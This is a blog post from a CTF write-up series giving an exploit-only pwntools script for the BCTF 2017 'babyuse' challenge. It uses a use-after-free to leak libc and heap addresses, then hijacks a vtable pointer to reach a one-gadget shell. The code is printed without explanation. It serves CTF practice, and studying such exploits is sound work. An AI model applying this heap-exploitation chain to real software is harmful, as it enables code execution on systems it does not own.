-
BCTF 2017 BabyusePwnable/CTF 2017. 12. 1. 13:51
Exploit ONLY
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889from pwn import *p=process("./babyuse")elf=ELF("./babyuse")def buy(gun,length,name):p.recvuntil('Exit')p.sendline("1")p.recvuntil('95')p.sendline(str(gun))p.recv(1024)p.sendline(str(length))p.recvuntil(':')p.sendline(name)def select(idx):p.recvuntil('Exit')p.sendline("2")p.recvuntil('gun')p.sendline(str(idx))def list():p.recvuntil('Exit')p.sendline("3")def rename(idx,length,name):p.recvuntil('Exit')p.sendline("4")p.recv(1024)p.sendline(str(idx))p.recvuntil(':')p.sendline(str(length))p.recvuntil(':')p.sendline(name)def use():p.recvuntil('Exit')p.sendline("5")print p.recvuntil('gun ')def use_input(what):p.recvuntil('menu')p.sendline(str(what))def drop(idx):p.recvuntil('Exit')p.sendline("6")p.recvuntil('delete:')p.sendline(str(idx))buy(2,256,"AAAA")buy(2,256,"BBBB")select(0)drop(0)use()main_arena = u32(p.recv(4)) - 0x38malloc_hook = main_arena - 0x10libc_base = malloc_hook - 0x1b2768one_shot = libc_base + 0x3ac69print hex(main_arena)print hex(libc_base)print hex(malloc_hook)print hex(one_shot)use_input(4)buy(2,40,"CCCC") #0buy(2,40,"DDDD") #2select(0)drop(2)drop(0)#0,2 off 1 onuse()heap = u32(p.recv(4))heap_base = heap - 0x68heap_vtable = heap_base + 0x250heap_fake = heap_base + 0x148use_input(4)print hex(heap)print hex(heap_base)print hex(heap_vtable)buy(1,40,"ZZZZ") #0buy(1,256,p32(one_shot)) #2select(0)drop(0)print "=========="rename(1,15,p32(heap_vtable)+p32(heap_fake))p.interactive()cs 'Pwnable > CTF' 카테고리의 다른 글
Christmas CTF 2017 infinite cat (0) 2017.12.30 HITCON 2016 house_of_orange (2) 2017.12.11 TUCTF 2017 Write up (0) 2017.11.27 CAT_SECURITY WhiteHackerLeague (2) 2017.11.19 RCTF 2017 RNOTE (0) 2017.11.08